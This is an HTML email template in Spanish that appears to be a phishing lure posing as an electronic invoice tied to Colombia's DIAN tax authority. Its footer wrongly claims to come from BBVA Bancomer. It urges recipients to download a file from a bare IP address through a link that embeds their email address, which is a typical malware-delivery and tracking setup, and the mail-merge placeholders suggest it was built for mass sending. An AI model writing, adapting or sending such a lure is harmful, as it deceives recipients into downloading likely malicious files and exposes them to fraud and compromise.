
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>factura %R10%
</title>
</head>
<body bgcolor="#EAEAEF" style="margin: 0; padding: 0; background-color: #EAEAEF; height: 100%;">

<table border="0" cellpadding="0" cellspacing="0" bgcolor="#EAEAEF" width="100%" style="background-color: #EAEAEF; overflow-x: hidden;">
<tr>
<td align="left">
<table bgcolor="#EAEAEF" align="center" border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; overflow-x: hidden; font-family:'proxima-nova' , sans-serif; width: 100%; max-width: 600px;">
<tr>
<td align="center" style="padding: 10px 0px 20px 0px; font-family:'proxima-nova' , sans-serif;">
</td>
</tr>
<tr>
<td align="center" >
<table align="center" border="0" cellpadding="0" cellspacing="0" style="overflow-x: hidden; margin: 0px 10px 0px 10px; border-top: 6px solid #11c76f;">
<tr>
<td align="left" bgcolor="#ffffff" style="padding: 40px 30px 0px 30px; font-family:'proxima-nova' , sans-serif;">
<h1 style="margin:0px; padding: 0;font-size:26px;color: #333F4C; line-height: 32px;">Factura Electrónica de Venta
</h1>
</td>
</tr>
<tr>
<td align="center" bgcolor="#ffffff" style="padding: 20px 30px 0px 30px; margin: 0px;">
<table style="width: 100%;">
<tr>
<td align="center" style="border-top: solid 1px #EAEAEF; border-left: none; border-right: none; border-bottom: none; border-collapse: collapse; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; width:100%; margin:0px 0px 0px 0px;">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td align="left" bgcolor="#ffffff" style="padding: 20px 30px 0px 30px;font-family:'proxima-nova' , sans-serif;">
<p style="padding: 0px; color: #333F4C; margin: 0; font-size: 18px; line-height: 28px;">Envío de la factura electrónica en formato XML por parte del vendedor a la DIAN para su validación.
<br>
<br>Haz lo que se te pide:
</p>
</td>
</tr>
<tr>
<td align="left" bgcolor="#ffffff" style="padding: 20px 20px 0px 20px;font-family:'proxima-nova' , sans-serif;"> 
<table align="center" border="0" cellpadding="10" cellspacing="0" style="overflow-x: hidden; margin: 0px 10px 0px 10px;"> 
<tr> 
<td style="color: #11c76f; margin: 0; font-size: 22px; font-weight: 600;line-height: 28px;"> 1 
</td>
<td > 
<p style="padding: 0px; color: #525F66; margin: 0; font-size: 18px; line-height: 28px;"> Descarga la factura electrónica desde el link:  
<strong><a href="http://23.95.168.20/adjunt/?hash=%emailcliente%">DESCARGAR</a> 
</strong>. 
</p>
</td>
</tr>
<tr> 
<td style="color: #11c76f; margin: 0; font-size: 22px; font-weight: 600;line-height: 28px;"> 2 
</td>
<td> 
<p style="padding: 0px; color: #525F66; margin: 0; font-size: 18px; line-height: 28px;"> 
Confirme toda la información en el archivo descargado <strong>descargado.</strong> 
</p>
</td>
</tr>
<tr> 
<td style="color: #11c76f; margin: 0; font-size: 22px; font-weight: 600;line-height: 28px;"> 3 
</td>
<td> 
<p style="padding: 0px; color: #525F66; margin: 0; font-size: 18px; line-height: 28px;"> Confirmar la recepción de la factura. 
</p>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td align="left" bgcolor="#ffffff" style="padding: 20px 30px 0px 30px;font-family:'proxima-nova' , sans-serif;"> 
<hr style="border: 1px solid #fafafa;"> 
</td>
</tr>
<tr>
<td align="left" bgcolor="#ffffff" style="padding: 20px 30px 0px 30px;font-family:'proxima-nova' , sans-serif;">
<p style="padding: 0px; color: #333F4C; margin: 0; font-size: 18px; line-height: 28px;">La única factura electrónica válida para circulación es la que reposa en el registro de factura de la DIAN, cuyos documentos están atados entre sí a través del código único de facturación electrónica CUFE.
</p>
</td>
</tr>
<tr>
<td align="left" bgcolor="#ffffff" style="padding: 40px 20px 0px 20px; font-family:'proxima-nova' , sans-serif; border-bottom-left-radius:10px;border-bottom-right-radius:10px;">
</td>
</tr>

<tr>
<td align="left" bgcolor="#EAEAEF" style="padding: 0px 10px 45px 10px; font-family:'proxima-nova' , sans-serif;">
<p style="padding: 0px; color: #7e8790; margin: 0; font-size: 12px; text-align: center;">  BBVA Bancomer S.A
<br>RFC: BBA830831LJ2
</p>
</td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</html>
